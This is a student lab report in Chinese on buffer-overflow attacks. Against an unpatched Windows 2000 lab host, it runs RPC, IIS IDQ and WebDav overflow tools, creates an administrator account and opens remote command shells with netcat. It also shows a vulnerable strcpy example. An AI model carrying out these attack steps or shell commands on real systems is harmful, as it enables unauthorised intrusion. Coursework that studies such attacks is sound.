缓冲区溢出攻击实验报告班级:10网工三班学生姓名:谢昊天学号:1215134046实验目的和要求:1、掌握缓冲区溢出的原理;2、了解缓冲区溢出常见的攻击方法和攻击工具;实验内容与分析设计:1、利用RPC漏洞建立超级用户利用工具scanms.exe文件检测RPC漏洞,利用工具软件attack.exe对172.18.25.109进行攻击。攻击的结果将在对方计算机上建立一个具有管理员权限的用户,并终止了对方的RPC服务。2、利用IIS溢出进行攻击利用软件SnakeIIS溢出工具可以让对方的IIS溢出,还可以捆绑执行的命令和在对方计算机上开辟端口。3、利用WebDav远程溢出使用工具软件nc.exe和webdavx3.exe远程溢出。实验步骤与调试过程:1.RPC漏洞出。首先调用RPC(RemoteProcedureCall)。当系统启动的时候,自动加载RPC服务。可以在服务列表中看到系统的RPC服务。利用RPC漏洞建立超级用户。首先,把scanms.exe文件拷贝到C盘跟目录下,检查地址段172.18.25.109到172.18.25.11。点击开始运行在运行中输入cmd确定。进入DOs模式、在C盘根目录下输入scanms.exe172.18.25.109-172.18.25.110,回车。检查漏洞。2.检查缓冲区溢出漏洞。利用工具软件attack.exe对172.18.25.109进行攻击。在进入DOC模式、在C盘根目录下输入acctack.exe172.18.25.109,回车。3,利用软件SnakeIIS溢出工具可以让对方的IIS溢出。进入IIS溢出工具软件的主界面.IP:172.18.25.109PORT:80监听端口为813单击IDQ溢出。出现攻击成功地提示对话框。4.利用工具软件nc.exe连接到该端口。进入DOs模式,在C盘根目录下输入nc.exe-vv172.18.25.109813回车。5.监听本地端口(1)先利用nc.exe命令监听本地的813端口。进入DOs模式,在C盘根目录下输入nc-l-p813回车。(2)这个窗口就这样一直保留,启动工具软件snake,本地的IP地址是172.18.25.110,要攻击的计算机的IP地址是172.18.25.109,选择溢出选项中的第一项,设置IP为本地IP地址,端口是813.点击按钮“IDQ溢出”。(3)查看nc命令的DOS框,在该界面下,已经执行了设置的DOS命令。将对方计算机的C盘根目录列出来,进入DOC模式,在C盘根目录下输入nc-l-p813回车。6.利用WebDav远程溢出使用工具软件nc.exe和webdavx3.exe远程溢出。(1)在DOS命令行下执行webdavx3.exe,进入DOC模式,在C盘根目录下输入webdavx3.exe172.18.25.109回车。(2)nc.exe程序入侵对方的计算机进入DOC模式,在C盘根目录下输入nc-vv172.18.25.1097788回车。实验结果:1.成功加载RPC服务。可以在服务列表中看到系统的RPC服务,见结果图。2.成功利用工具软件attack.exe对172.18.25.109进行攻击。3.成功利用IIS溢出进行攻击利用软件SnakeIIS溢出工具让对方的IIS溢出,从而捆绑执行的命令和在对方计算机上开辟端口。4.利用软件工具attack.exe攻击结果将在对方计算机上建立一个具有管理员权限地用户,并终止对方地rpc服务。5.先利用nc.exe命令监听6.利用工具软件attack.exe对172.18.25.109进行攻击。7.利用WebDav远程溢出使用工具软件nc.exe和webdavx3.exe远程溢出。8.具体结果见上传实验报告,实验结果图。疑难小结:通过本次试验,我对缓冲区溢出攻击有了进一步的了解,通过动手实现其设置缓冲区溢出攻击,我掌握了缓冲区溢出攻击的工作原理、入侵过程及危害。成功加载RPC服务。成功利用IIS溢出进行攻击利用软件SnakeIIS溢出工具让对方的IIS溢出,从而捆绑执行的命令和在对方计算机上开辟端口。利用软件工具attack.exe攻击结果将在对方计算机上建立一个具有管理员权限地用户,并终止对方地rpc服务。通过本次试验使我更加深刻的理解了缓冲区溢出攻击的特点。同时,在实验过程中,回顾书本上的理论知识,巩固了我的知识。主要算法和程序清单:1.把scanms.exe文件拷贝到C盘跟目录下,检查地址段172.18.25.109到172.18.25.11.点击2.开始运行在运行中输入cmd确定。进入DOs模式、在C盘根目录下输入scanms.exe172.18.25.109-172.18.25.110,回车。检查漏洞。3.利用工具软件attack.exe对172.18.25.109进行攻击。4.在进入DOC模式、在C盘根目录下输入acctack.exe172.18.25.109,回车。5.利用工具软件nc.exe连接到该端口,进入DOs模式,在C盘根目录下输入nc.exe-vv172.18.25.109813回车。6.voidfunction(char*szPara1){charbuff[16];strcpy(buffer,szPara1);}7.程序中利用strcpy函数将szPara1中的内容拷贝到buff中,只要szPara1的长度大于16,就会造成缓冲区溢出。存在strcpy函数这样问题的C语言函数还有:strcat()、gets()、scanf()等。8.利用IIS溢出进行攻击利用软件SnakeIIS溢出工具可以让对方的IIS溢出,还可以捆绑执行的命令和在对方计算机上开辟端口。(1)利用软件SnakeIIS溢出工具可以让对方的IIS溢出,还可以捆绑执行的命令和在对方计算机上开辟端口工具软件的主界面(2)利用IIS溢出进行攻击9.监听本地端口10.查看nc命令的DOS框11.利用WebDav远程溢出使用工具软件nc.exe和webdavx3.exe远程溢出。实验结果图:1.应用程序呼叫网络上的计算机。当系统启动的时候,自动加载RPC服务。可以在服务列表中看到系统的RPC服务,如图所示:2利用RPC漏洞建立超级用户1,首先,把scanms.exe文件拷贝到C盘跟目录下,检查地址段172.18.25.109到172.18.25.113,检查缓冲区溢出漏洞1.利用工具软件attack.exe对172.18.25.109进行攻击。如图所示:4,利用IIS溢出进行攻击利用软件SnakeIIS溢出工具可以让对方的IIS溢出,还可以捆绑执行的命令和在对方计算机上开辟端口。1.利用软件SnakeIIS溢出工具可以让对方的IIS溢出,还可以捆绑执行的命令和在对方计算机上开辟端口工具软件的主界面如图所示2,利用IIS溢出进行攻击该软件适用于各种类型的操作系统,比如对172.18.25.109进行攻击,172.18.25.109的操作系统的Windows2000,没有安装补丁程序,攻击完毕后,开辟一个813端口,并在对方计算机上执行命令“dirc:\”,。设置如图所示单击IDQ溢出。出现攻击成功地提示对话框如图所示。这个时候,813端口已经开放,利用工具软件nc.exe连接到该端口,将会自动执行改才发送的DOS命令“dirc:\”,使用的语法是:nc.exe-vv172.18.25.109813,其中-vv是程序的参数,813是目标端口。可以看到命令的执行结果,如图所示。监听本地端口先利用nc.exe命令监听本地的813端口。使用的基本语法是“nc-l-p813”,执行的过程如图所示。这个窗口就这样一直保留,启动工具软件snake,本地的IP地址是172.18.25.110,要攻击的计算机的IP地址是172.18.25.109,选择溢出选项中的第一项,设置IP为本地IP地址,端口是813,如图所示。点击按钮“IDQ溢出”,程序显示对话框如图所示。查看nc命令的DOS框,在该界面下,已经执行了设置的DOS命令。将对方计算机的C盘根目录列出来,如图所示3、利用WebDav远程溢出使用工具软件nc.exe和webdavx3.exe远程溢出。使用工具软件有nc.exe和webdavx3.exe。首先在DOS命令行下执行webdavx3.exe,如图所示。在命令后面直接跟对方的IP地址就可以了,现在要攻击的计算机是172.18.25.109,执行情况如图所示。nc.exe程序入侵对方的计算机,过程如图所示。